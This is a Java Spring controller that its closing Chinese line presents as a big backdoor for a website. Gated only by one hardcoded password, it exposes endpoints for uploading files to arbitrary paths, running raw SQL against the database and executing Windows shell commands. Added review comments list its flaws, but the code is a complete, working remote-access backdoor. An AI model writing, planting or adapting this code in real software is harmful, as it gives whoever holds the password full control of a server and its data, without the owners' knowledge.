package com.iems.controller;
import org.apache.commons.io.FileUtils;
import org.springframework.jdbc.core.JdbcTemplate;
import org.springframework.jdbc.core.RowMapper;
import org.springframework.web.bind.annotation.*;
import org.springframework.web.multipart.MultipartFile;
import javax.annotation.Resource;
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.Date;
import java.util.List;
/**
* Created with IntelliJ IDEA
* by zhao ji ping 艾思科技
*/
/**
 * Spring REST controller exposing four remote-administration primitives — file upload,
 * raw SQL execute/update/query, and OS command execution — each gated solely by a
 * {@code String.equals} comparison against one hardcoded literal.
 *
 * <p>NOTE(review): nothing else in this class restricts access: no authentication
 * framework, no authorization, no audit logging and no validation of the
 * {@code cmd}/{@code sql}/file inputs, which are handed verbatim to the filesystem, the
 * database and a shell respectively. Every {@code password} parameter is declared
 * {@code required = false}, so omitting it makes {@code password.equals(...)} throw
 * {@link NullPointerException} before the endpoint's own "500" reply is reached.
 * {@code @CrossOrigin} with no arguments presumably permits all origins — confirm against
 * the Spring version in use.
 */
@RestController
@CrossOrigin
public class CmdController {
    /** Container-injected JdbcTemplate shared by the three SQL endpoints. */
    @Resource
    JdbcTemplate jdbcTemplate;

    /**
     * Saves an uploaded multipart file under the hardcoded Windows directory
     * {@code C:\upload}, using the client-supplied original filename as the destination.
     *
     * <p>{@code @RequestMapping} without a {@code method} attribute binds every HTTP verb.
     *
     * @param file     the multipart payload; {@code getOriginalFilename()} is used as-is
     * @param password compared against the hardcoded literal; optional (see class note)
     * @return the literal {@code "500"} on password mismatch, otherwise a message that
     *         echoes {@code C:/upload/} plus the client's filename
     * @throws IOException if reading the multipart stream or writing the file fails
     */
    @RequestMapping("/fileUpload")
    public String fileUpload(
            @RequestParam("file") MultipartFile file,
            @RequestParam(name = "password", required = false) String password) throws IOException {
        // Single shared static secret, repeated verbatim in every endpoint below.
        if (!password.equals("2023-PSWD-ADMIN-AISI")) return "500";
        String filePath = "C:\\upload";
        File fileDir = new File(filePath);
        // NOTE(review): if filePath exists as a regular file the condition is false, mkdir is
        // skipped and the copy below fails; mkdir()'s boolean result is ignored either way.
        if (!fileDir.exists() && !fileDir.isDirectory()) {
            fileDir.mkdir();
        }
        // NOTE(review): the filename is client-controlled and is neither normalized nor
        // checked to resolve under filePath (no resolve/normalize/startsWith guard), so the
        // final write location is whatever the client names relative to C:\upload.
        String fileName= file.getOriginalFilename();
        File savedFile = new File(filePath, fileName);
        FileUtils.copyInputStreamToFile(file.getInputStream(),savedFile);
        return "文件上传成功, 上传路径为: C:/upload/" + fileName;
    }

    /**
     * Runs the {@code cmd} request parameter as a raw SQL statement through
     * {@link JdbcTemplate#execute(String)}; nothing is validated or parameterized.
     *
     * @param sql      statement text from the {@code cmd} parameter; optional, may be null
     * @param password compared against the hardcoded literal; optional (see class note)
     * @return {@code "500"} on password mismatch, otherwise a fixed "executed" message
     *         (a failing statement surfaces as an unchecked DataAccessException instead)
     */
    @PostMapping("/sqlExecute")
    public String sqlExecute(@RequestParam(name="cmd", required = false) String sql,
                             @RequestParam(name="password", required = false) String password) {
        if (!password.equals("2023-PSWD-ADMIN-AISI")) return "500";
        jdbcTemplate.execute(sql);
        return "命令已执行";
    }

    /**
     * Runs the {@code cmd} request parameter as a raw DML statement through
     * {@link JdbcTemplate#update(String)} and returns the affected-row count.
     *
     * <p>NOTE(review): the password-mismatch reply is the Integer {@code 500}, which is
     * indistinguishable from a genuine update that touched 500 rows.
     *
     * @param sql      statement text from the {@code cmd} parameter; optional, may be null
     * @param password compared against the hardcoded literal; optional (see class note)
     * @return {@code 500} on password mismatch, otherwise the JDBC update count
     */
    @PostMapping("/sqlUpdate")
    public Integer sqlUpdate(@RequestParam(name="cmd", required = false) String sql,
                             @RequestParam(name="password", required = false) String password) {
        if (!password.equals("2023-PSWD-ADMIN-AISI")) return 500;
        Integer result = jdbcTemplate.update(sql);
        return result;
    }

    /**
     * Runs the {@code cmd} request parameter as a raw SQL query and renders each result
     * row as one string: every column's {@code getString} value followed by {@code " | "}
     * (so each row ends with a trailing separator, and SQL NULLs render as {@code "null"}).
     *
     * @param sql      query text from the {@code cmd} parameter; optional, may be null
     * @param password compared against the hardcoded literal; optional (see class note)
     * @return a single-element list {@code ["500"]} on password mismatch, otherwise one
     *         rendered string per row
     */
    @PostMapping("/sqlQuery")
    public List<String> sqlQuery(@RequestParam(name="cmd", required = false) String sql,
                                 @RequestParam(name="password", required = false) String password) {
        if (!password.equals("2023-PSWD-ADMIN-AISI")) {
            List<String> e = new ArrayList<>();
            e.add("500");
            return e;
        }
        // Set the SQL statement (author's leftover example: String sql = "select * from user limit 10";)
        // Execute the SQL statement; the author's comment said "return map", but the raw
        // RowMapper below yields one String per row, assigned to List<String> unchecked.
        List<String> list = jdbcTemplate.query(sql, new RowMapper() {
            @Override
            public Object mapRow(ResultSet resultSet, int i) throws SQLException {
                String row = "";
                // Column count is read from metadata on every row.
                Integer size = resultSet.getMetaData().getColumnCount();
                for(int ii = 1; ii<=size; ii++) {
                    // String concatenation in a loop; each column is followed by " | ".
                    row += resultSet.getString(ii) + " | ";
                }
                return row;
            }
        });
        return list;
    }

    /**
     * Executes the {@code cmd} request parameter through the Windows command interpreter
     * as {@code CMD /C <cmd>} and returns whatever the process wrote to stdout/stderr.
     *
     * <p>NOTE(review): {@code cmd} is passed as a single argument, so the shell performs
     * all parsing; nothing is validated. A null {@code cmd} reaches
     * {@code ProcessBuilder.start()} as a null list element, whose NullPointerException is
     * caught in {@link #run} and returned as text. This endpoint only works on Windows.
     *
     * @param cmd      the command line to hand to {@code CMD /C}; optional, may be null
     * @param password compared against the hardcoded literal; optional (see class note)
     * @return {@code "500"} on password mismatch, otherwise the process output (or the
     *         string form of whatever exception occurred)
     */
    @PostMapping("/cmd")
    public String cmd(@RequestParam(name="cmd", required = false) String cmd,
                      @RequestParam(name="password", required = false) String password) {
        if (!password.equals("2023-PSWD-ADMIN-AISI")) return "500";
        List<String> commands = new ArrayList<>();
        commands.add("CMD");
        commands.add("/C");
        commands.add(cmd);
        String msg = run(commands);
        return msg;
    }

    /**
     * Starts the given command list with stderr merged into stdout and reads the merged
     * stream to EOF, decoding it as GBK.
     *
     * <p>NOTE(review): the process is never waited for, so its exit status is unknown and
     * the returned text may be the output of a process that failed; only the raw
     * InputStream is closed (not the reader), and not on the exception paths. Both
     * catch blocks convert any Throwable subclass of Exception into its {@code toString()}
     * and return it as data, so failures are reported to the caller as ordinary output.
     * The outer try/catch duplicates the inner one; the ProcessBuilder constructor itself
     * is not expected to throw for a non-null list.
     *
     * @param commands the argv list for {@link ProcessBuilder}
     * @return the process's combined output decoded as GBK, or an exception's string form
     */
    private String run(List<String> commands){
        try {
            ProcessBuilder pb = new ProcessBuilder(commands);
            // Merge stderr into stdout so a single read loop captures both.
            pb.redirectErrorStream(true);
            try {
                Process p = pb.start();
                InputStream inputStream = p.getInputStream();
                // Output is decoded with the hardcoded GBK charset (Chinese Windows console).
                InputStreamReader inputStreamReader = new InputStreamReader(inputStream, "gbk");
                int len = -1;
                char[] c = new char[1024];
                // StringBuffer (synchronized) used where no sharing occurs.
                StringBuffer st = new StringBuffer();
                while ((len = inputStreamReader.read(c)) != -1){
                    String s = new String(c, 0, len);
                    st.append(s);
                }
                inputStream.close();
                return st.toString();
            } catch (Exception e) {
                // Exception text becomes the return value.
                return e.toString();
            }
        }catch (Exception e) {
            // Same reporting as the inner block; see the method note on redundancy.
            return e.toString();
        }
    }
}
给网站加个大大的后门, 直接可以远程操作, 非常的方便